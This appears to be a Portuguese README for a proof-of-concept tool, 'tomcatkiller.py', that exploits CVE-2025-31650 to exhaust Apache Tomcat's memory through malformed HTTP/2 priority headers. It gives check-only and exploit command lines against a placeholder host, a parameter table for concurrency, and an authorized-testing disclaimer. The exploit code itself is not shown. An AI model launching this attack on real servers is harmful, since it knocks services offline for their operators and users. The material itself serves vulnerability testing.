
CVE-2025-31650 PoC
🚨 Prova de Conceito (PoC) da vulnerabilidade de DoS em HTTP/2 do Apache Tomcat (CVE-2025-31650)
Este script provoca uma condição de esgotamento de memória no Apache Tomcat ao enviar cabeçalhos priority malformados via HTTP/2.
Server (detecta Tomcat)--check-only (não intrusivo)python3 tomcatkiller.py --target https://example.com:8443 --check-only
python3 tomcatkiller.py --target https://example.com:8443 --exploit --tasks 50 --requests 5000
| Parâmetro | Descrição |
|---|---|
--target | URL completa do alvo com protocolo e porta |
--check-only | Apenas testa se o servidor suporta HTTP/2 e Tomcat |
--exploit | Executa de fato o ataque de DoS |
--tasks | Número de tarefas assíncronas (padrão: 50) |
--requests | Requisições por tarefa (padrão: 5000) |
Este PoC é apenas para fins educacionais e testes de segurança autorizados.
Não o utilize contra sistemas sem permissão explícita.